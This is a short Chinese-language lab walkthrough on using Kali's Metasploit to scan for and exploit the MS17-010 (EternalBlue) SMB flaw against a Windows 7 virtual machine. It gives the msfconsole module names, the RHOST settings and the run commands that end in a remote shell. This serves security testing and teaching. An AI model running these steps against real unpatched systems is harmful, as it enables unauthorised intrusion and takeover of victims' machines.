Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击(也通常用于回溯分析)。
此次采用kali Linux系统集成的metasploit进行测试验证MS17-010(永恒之蓝,著名比特币勒索漏洞)。实验环境采用虚拟机,kali 测试机,windows 7 x64 测试靶机。
一、使用scanner下扫描模块扫描是否存在漏洞。
①启用msf之前需要启用postgres服务
②msfconsole //启用msf
③search smb_ms17_010 //使用search 查找ms17_010利用工具目录
④use auxiliary/scanner/smb/smb_ms17_010 //调用scanner smb_ms17_010模块进行扫描
并使用show options查看设置参数
⑥set RHOSTS 192.168.198.136 //设置扫描地址(可设置扫描段 eg: set RHOSTS 192.168.198.0/24)
设置好之后,使用show options查看配置信息,并使用exploit进行测试(利用测试,显示绿色的+,以及提示信息,即为存在漏洞主机)。
二、使用exploit下利用模块进行漏洞攻击。
①use exploit/windows/smb/ms17_010_eternalblue //调用exploit下的ms17_010_eternalblue模块
使用show options查看参数设置
③set RHOST 192.168.198.136 //设置目标靶机
并使用exploit调用漏洞测试,成功拿到目标shell
